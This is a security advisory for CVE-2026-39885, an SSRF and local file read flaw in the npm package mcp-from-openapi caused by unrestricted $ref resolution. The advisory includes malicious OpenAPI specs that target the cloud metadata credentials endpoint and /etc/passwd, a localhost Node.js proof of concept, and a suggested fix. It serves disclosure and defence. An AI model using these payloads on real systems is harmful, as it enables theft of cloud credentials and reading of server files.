GHSA-v6ph-xcq9-qxxj
Suggest an improvement- Source
- https://github.com/advisories/GHSA-v6ph-xcq9-qxxj
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-v6ph-xcq9-qxxj/GHSA-v6ph-xcq9-qxxj.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-v6ph-xcq9-qxxj
- Aliases
-
- CVE-2026-39885
- Published
- 2026-04-08T19:22:53Z
- Modified
- 2026-04-09T14:47:24.272767Z
- Severity
-
- 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVSS Calculator
- Summary
- mcp-from-openapi is Vulnerable to SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications
- Details
-
Summary
The
mcp-from-openapilibrary uses@apidevtools/json-schema-ref-parserto dereference$refpointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing$refvalues pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during theinitialize()call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.Affected Versions
<= 2.1.2(latest)CWE
CWE-918: Server-Side Request Forgery (SSRF)
Vulnerability Details
File:
index.jslines 870-875When
OpenAPIToolGenerator.initialize()is called, it dereferences the OpenAPI document usingjson-schema-ref-parser:this.dereferencedDocument = await import_json_schema_ref_parser.default.dereference( JSON.parse(JSON.stringify(this.document)) );No options are passed to
.dereference()— no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in$refvalues, including:http://andhttps://URLs (internal services, cloud metadata)file://URLs (local filesystem)
This is the default behavior of
json-schema-ref-parser— it resolves all$refpointers by fetching the referenced resource.Exploitation
Attack 1: SSRF to internal services / cloud metadata
A malicious OpenAPI spec containing:
{ "openapi": "3.0.0", "info": { "title": "Evil API", "version": "1.0" }, "paths": { "/test": { "get": { "operationId": "getTest", "summary": "test", "responses": { "200": { "description": "OK", "content": { "application/json": { "schema": { "$ref": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" } } } } } } } } }When processed by
OpenAPIToolGenerator, the library fetcheshttp://169.254.169.254/latest/meta-data/iam/security-credentials/from the server, potentially leaking AWS IAM credentials.Attack 2: Local file read
{ "$ref": "file:///etc/passwd" }The ref parser reads local files and includes their contents in the dereferenced output.
Proof of Concept
const http = require('http'); const { OpenAPIToolGenerator } = require('mcp-from-openapi'); // Start attacker server to prove SSRF const srv = http.createServer((req, res) => { console.log(`SSRF HIT: ${req.method} ${req.url}`); res.writeHead(200, {'Content-Type': 'application/json'}); res.end('{"type":"string"}'); }); srv.listen(9997, async () => { const spec = { openapi: '3.0.0', info: { title: 'Evil', version: '1.0' }, paths: { '/test': { get: { operationId: 'getTest', summary: 'test', responses: { '200': { description: 'OK', content: { 'application/json': { schema: { '$ref': 'http://127.0.0.1:9997/ssrf-proof' } } } } } } } } }; const gen = new OpenAPIToolGenerator(spec, { validate: false }); await gen.initialize(); // Output: "SSRF HIT: GET /ssrf-proof" // The library fetched our attacker URL during $ref dereferencing. srv.close(); });Tested and confirmed on mcp-from-openapi v2.1.2. The attacker server receives the GET request during
initialize().Impact
- Cloud credential theft —
$refpointing tohttp://169.254.169.254/steals AWS/GCP/Azure metadata - Internal network scanning —
$refvalues can probe internal services and ports - Local file read —
file://protocol reads arbitrary files from the server filesystem - No privileges required — attacker only needs to provide a crafted OpenAPI spec to any application using this library
Suggested Fix
Pass resolver options to
dereference()that restrict which protocols and hosts are allowed:this.dereferencedDocument = await $RefParser.dereference( JSON.parse(JSON.stringify(this.document)), { resolve: { file: false, // Disable file:// protocol http: { // Only allow same-origin or explicitly allowed hosts headers: this.options.headers, timeout: this.options.timeout, } } } );Or disable all external resolution and require all schemas to be inline:
this.dereferencedDocument = await $RefParser.dereference( JSON.parse(JSON.stringify(this.document)), { resolve: { file: false, http: false, https: false } } ); - Database specific
{ "github_reviewed": true, "github_reviewed_at": "2026-04-08T19:22:53Z", "cwe_ids": [ "CWE-918" ], "severity": "HIGH", "nvd_published_at": "2026-04-08T21:17:00Z" }- References
Affected packages
npm / mcp-from-openapi
Package
- Name
- mcp-from-openapi
- View open source insights on deps.dev
- Purl
- pkg:npm/mcp-from-openapi
npm / @frontmcp/sdk
Package
- Name
- @frontmcp/sdk
- View open source insights on deps.dev
- Purl
- pkg:npm/%40frontmcp/sdk
npm / @frontmcp/adapters
Package
- Name
- @frontmcp/adapters
- View open source insights on deps.dev
- Purl
- pkg:npm/%40frontmcp/adapters